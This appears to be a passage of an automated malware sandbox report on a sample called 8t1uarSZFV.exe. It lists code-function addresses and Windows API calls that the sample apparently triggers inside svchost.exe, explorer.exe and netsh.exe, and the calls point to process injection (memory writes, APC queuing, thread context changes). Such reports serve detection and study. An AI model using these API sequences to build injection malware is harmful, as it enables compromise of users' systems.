          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03014650 NtSuspendThread,1_2_03014650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012B80 NtQueryInformationFile,1_2_03012B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012BA0 NtEnumerateValueKey,1_2_03012BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012BE0 NtQueryValueKey,1_2_03012BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012AB0 NtWaitForSingleObject,1_2_03012AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012AF0 NtWriteFile,1_2_03012AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012F60 NtCreateProcessEx,1_2_03012F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012FA0 NtQuerySection,1_2_03012FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012E30 NtWriteVirtualMemory,1_2_03012E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012EE0 NtQueueApcThread,1_2_03012EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012D00 NtSetInformationFile,1_2_03012D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012DB0 NtEnumerateKey,1_2_03012DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012C00 NtQueryInformationProcess,1_2_03012C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012C60 NtCreateKey,1_2_03012C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012C70 NtFreeVirtualMemory,1_2_03012C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012CC0 NtQueryVirtualMemory,1_2_03012CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012CF0 NtOpenProcess,1_2_03012CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03013010 NtOpenDirectoryObject,1_2_03013010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03013090 NtSetValueKey,1_2_03013090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030135C0 NtCreateMutant,1_2_030135C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030139B0 NtGetContextThread,1_2_030139B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03013D10 NtOpenProcessToken,1_2_03013D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03013D70 NtOpenThread,1_2_03013D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,1_2_00ECA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00ECA042 NtQueryInformationProcess,1_2_00ECA042
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB7E232 NtCreateFile,2_2_0FB7E232
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB7FE12 NtProtectVirtualMemory,2_2_0FB7FE12
          Source: C:\Windows\explorer.exeCode function: 2_2_0FB7FE0A NtProtectVirtualMemory,2_2_0FB7FE0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2B60 NtClose,LdrInitializeThunk,3_2_035F2B60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2AD0 NtReadFile,LdrInitializeThunk,3_2_035F2AD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2F30 NtCreateSection,LdrInitializeThunk,3_2_035F2F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2FE0 NtCreateFile,LdrInitializeThunk,3_2_035F2FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_035F2EA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_035F2D10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2DD0 NtDelayExecution,LdrInitializeThunk,3_2_035F2DD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_035F2DF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_035F2C70
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2C60 NtCreateKey,LdrInitializeThunk,3_2_035F2C60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 3_2_035F2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_035F2CA0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F35C0 NtCreateMutant,LdrInitializeThunk, | 3_2_035F35C0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F4340 NtSetContextThread, | 3_2_035F4340
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F4650 NtSuspendThread, | 3_2_035F4650
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2BF0 NtAllocateVirtualMemory, | 3_2_035F2BF0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2BE0 NtQueryValueKey, | 3_2_035F2BE0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2B80 NtQueryInformationFile, | 3_2_035F2B80
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2BA0 NtEnumerateValueKey, | 3_2_035F2BA0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2AF0 NtWriteFile, | 3_2_035F2AF0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2AB0 NtWaitForSingleObject, | 3_2_035F2AB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2F60 NtCreateProcessEx, | 3_2_035F2F60
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2F90 NtProtectVirtualMemory, | 3_2_035F2F90
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2FB0 NtResumeThread, | 3_2_035F2FB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2FA0 NtQuerySection, | 3_2_035F2FA0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2E30 NtWriteVirtualMemory, | 3_2_035F2E30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2EE0 NtQueueApcThread, | 3_2_035F2EE0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2E80 NtReadVirtualMemory, | 3_2_035F2E80
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2D00 NtSetInformationFile, | 3_2_035F2D00
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2D30 NtUnmapViewOfSection, | 3_2_035F2D30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2DB0 NtEnumerateKey, | 3_2_035F2DB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2C00 NtQueryInformationProcess, | 3_2_035F2C00
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2CC0 NtQueryVirtualMemory, | 3_2_035F2CC0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F2CF0 NtOpenProcess, | 3_2_035F2CF0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F3010 NtOpenDirectoryObject, | 3_2_035F3010
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F3090 NtSetValueKey, | 3_2_035F3090
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F39B0 NtGetContextThread, | 3_2_035F39B0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F3D70 NtOpenThread, | 3_2_035F3D70
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F3D10 NtOpenProcessToken, | 3_2_035F3D10
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0095A350 NtCreateFile, | 3_2_0095A350
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0095A480 NtClose, | 3_2_0095A480
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0095A400 NtReadFile, | 3_2_0095A400
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0095A47A NtClose, | 3_2_0095A47A
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010CA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread, | 3_2_010CA036
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010C9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, | 3_2_010C9BAF
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010CA042 NtQueryInformationProcess, | 3_2_010CA042
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010C9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, | 3_2_010C9BB2
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100D5EB: CreateFileW,DeviceIoControl,CloseHandle, | 0_2_0100D5EB
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01001201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 0_2_01001201
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, | 0_2_0100E8F6
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FA8060 | 0_2_00FA8060
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01012046 | 0_2_01012046
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01008298 | 0_2_01008298
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FDE4FF | 0_2_00FDE4FF
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FD676B | 0_2_00FD676B
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01034873 | 0_2_01034873
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FACAF0 | 0_2_00FACAF0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FCCAA0 | 0_2_00FCCAA0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FBCC39 | 0_2_00FBCC39
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FD6DD9 | 0_2_00FD6DD9
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FA91C0 | 0_2_00FA91C0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FBB119 | 0_2_00FBB119
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC1394 | 0_2_00FC1394
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC1706 | 0_2_00FC1706
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC781B | 0_2_00FC781B
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC19B0 | 0_2_00FC19B0
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FB997D | 0_2_00FB997D
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FA7920 | 0_2_00FA7920
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC7A4A | 0_2_00FC7A4A
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC7CA7 | 0_2_00FC7CA7
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC1C77 | 0_2_00FC1C77
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FD9EEE | 0_2_00FD9EEE
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0102BE44 | 0_2_0102BE44
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC1F32 | 0_2_00FC1F32
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00F035E0 | 0_2_00F035E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401030 | 1_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402D88 | 1_2_00402D88
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402D90 | 1_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041D593 | 1_2_0041D593
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00409E50 | 1_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041EE2E | 1_2_0041EE2E
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E793 | 1_2_0041E793
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402FB0 | 1_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309A352 | 1_2_0309A352
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A03E6 | 1_2_030A03E6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEE3F0 | 1_2_02FEE3F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03080274 | 1_2_03080274
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030602C0 | 1_2_030602C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307A118 | 1_2_0307A118
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03068158 | 1_2_03068158
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A01AA | 1_2_030A01AA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030941A2 | 1_2_030941A2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030981CC | 1_2_030981CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072000 | 1_2_03072000
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD0100 | 1_2_02FD0100
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFC6E0 | 1_2_02FFC6E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03004750 | 1_2_03004750
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDC7C0 | 1_2_02FDC7C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0770 | 1_2_02FE0770
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A0591 | 1_2_030A0591
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03084420 | 1_2_03084420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03092446 | 1_2_03092446
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0535 | 1_2_02FE0535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0308E4F6 | 1_2_0308E4F6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309AB40 | 1_2_0309AB40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDEA80 | 1_2_02FDEA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03096BD7 | 1_2_03096BD7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC68B8 | 1_2_02FC68B8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AA9A6 | 1_2_030AA9A6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE2840 | 1_2_02FE2840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEA840 | 1_2_02FEA840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE29A0 | 1_2_02FE29A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF6962 | 1_2_02FF6962
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300E8F0 | 1_2_0300E8F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03022F28 | 1_2_03022F28
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03000F30 | 1_2_03000F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03082F30 | 1_2_03082F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03054F40 | 1_2_03054F40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2E90 | 1_2_02FF2E90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305EFA0 | 1_2_0305EFA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0E59 | 1_2_02FE0E59
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309EE26 | 1_2_0309EE26
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD2FC8 | 1_2_02FD2FC8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309CE93 | 1_2_0309CE93
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309EEDB | 1_2_0309EEDB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD0CF2 | 1_2_02FD0CF2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307CD1F | 1_2_0307CD1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0C00 | 1_2_02FE0C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDADE0 | 1_2_02FDADE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF8DBF | 1_2_02FF8DBF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03080CB5 | 1_2_03080CB5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEAD00 | 1_2_02FEAD00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFD2F0 | 1_2_02FFD2F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309132D | 1_2_0309132D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFB2C0 | 1_2_02FFB2C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE52A0 | 1_2_02FE52A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302739A | 1_2_0302739A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCD34C | 1_2_02FCD34C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030812ED | 1_2_030812ED
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE70C0 | 1_2_02FE70C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AB16B | 1_2_030AB16B
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0301516C | 1_2_0301516C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEB1B0 | 1_2_02FEB1B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCF172 | 1_2_02FCF172
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0308F0CC | 1_2_0308F0CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030970E9 | 1_2_030970E9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309F0E0 | 1_2_0309F0E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309F7B0 | 1_2_0309F7B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03025630 | 1_2_03025630
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030916CC | 1_2_030916CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03097571 | 1_2_03097571
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD1460 | 1_2_02FD1460
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307D5B0 | 1_2_0307D5B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A95C3 | 1_2_030A95C3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309F43F | 1_2_0309F43F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309FB76 | 1_2_0309FB76
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03055BF0 | 1_2_03055BF0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0301DBF9 | 1_2_0301DBF9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309FA49 | 1_2_0309FA49
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03097A46 | 1_2_03097A46
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03053A6C | 1_2_03053A6C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFB80 | 1_2_02FFFB80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03025AA0 | 1_2_03025AA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307DAAC | 1_2_0307DAAC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03081AA3 | 1_2_03081AA3
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0308DAC6 | 1_2_0308DAC6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03075910 | 1_2_03075910
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE38E0 | 1_2_02FE38E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304D800 | 1_2_0304D800
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE9950 | 1_2_02FE9950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFB950 | 1_2_02FFB950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309FF09 | 1_2_0309FF09
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE9EB0 | 1_2_02FE9EB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309FFB1 | 1_2_0309FFB1
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FA3FD2 | 1_2_02FA3FD2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FA3FD5 | 1_2_02FA3FD5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE1F92 | 1_2_02FE1F92
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03091D5A | 1_2_03091D5A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03097D73 | 1_2_03097D73
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03059C32 | 1_2_03059C32
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFDC0 | 1_2_02FFFDC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE3D40 | 1_2_02FE3D40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309FCF2 | 1_2_0309FCF2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00ECA036 | 1_2_00ECA036
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00EC1082 | 1_2_00EC1082
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00ECB232 | 1_2_00ECB232
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00ECE5CD | 1_2_00ECE5CD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00EC8912 | 1_2_00EC8912
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00EC5B30 | 1_2_00EC5B30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00EC5B32 | 1_2_00EC5B32
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00EC2D02 | 1_2_00EC2D02
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F631B32 | 2_2_0F631B32
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F631B30 | 2_2_0F631B30
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F637232 | 2_2_0F637232
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F62ED02 | 2_2_0F62ED02
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F634912 | 2_2_0F634912
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F63A5CD | 2_2_0F63A5CD
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F636036 | 2_2_0F636036
          Source: C:\Windows\explorer.exe | Code function: 2_2_0F62D082 | 2_2_0F62D082
          Source: C:\Windows\explorer.exe | Code function: 2_2_0FB7E232 | 2_2_0FB7E232
          Source: C:\Windows\explorer.exe | Code function: 2_2_0FB815CD | 2_2_0FB815CD
          Source: C:\Windows\explorer.exe | Code function: 2_2_0FB78B32 | 2_2_0FB78B32
          Source: C:\Windows\explorer.exe | Code function: 2_2_0FB78B30 | 2_2_0FB78B30
          Source: C:\Windows\explorer.exe | Code function: 2_2_0FB7B912 | 2_2_0FB7B912
          Source: C:\Windows\explorer.exe | Code function: 2_2_0FB75D02 | 2_2_0FB75D02
          Source: C:\Windows\explorer.exe | Code function: 2_2_0FB74082 | 2_2_0FB74082
          Source: C:\Windows\explorer.exe | Code function: 2_2_0FB7D036 | 2_2_0FB7D036
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_01565EB0 | 3_2_01565EB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367A352 | 3_2_0367A352
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_036803E6 | 3_2_036803E6
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035CE3F0 | 3_2_035CE3F0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03660274 | 3_2_03660274
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_036402C0 | 3_2_036402C0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03648158 | 3_2_03648158
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035B0100 | 3_2_035B0100
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0365A118 | 3_2_0365A118
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_036781CC | 3_2_036781CC
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_036801AA | 3_2_036801AA
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_036741A2 | 3_2_036741A2
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03652000 | 3_2_03652000
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035E4750 | 3_2_035E4750
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C0770 | 3_2_035C0770
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035BC7C0 | 3_2_035BC7C0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035DC6E0 | 3_2_035DC6E0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C0535 | 3_2_035C0535
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03680591 | 3_2_03680591
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03672446 | 3_2_03672446
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03664420 | 3_2_03664420
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0366E4F6 | 3_2_0366E4F6
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367AB40 | 3_2_0367AB40
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03676BD7 | 3_2_03676BD7
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035BEA80 | 3_2_035BEA80
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035D6962 | 3_2_035D6962
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0368A9A6 | 3_2_0368A9A6
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C29A0 | 3_2_035C29A0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035CA840 | 3_2_035CA840
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C2840 | 3_2_035C2840
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035EE8F0 | 3_2_035EE8F0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035A68B8 | 3_2_035A68B8
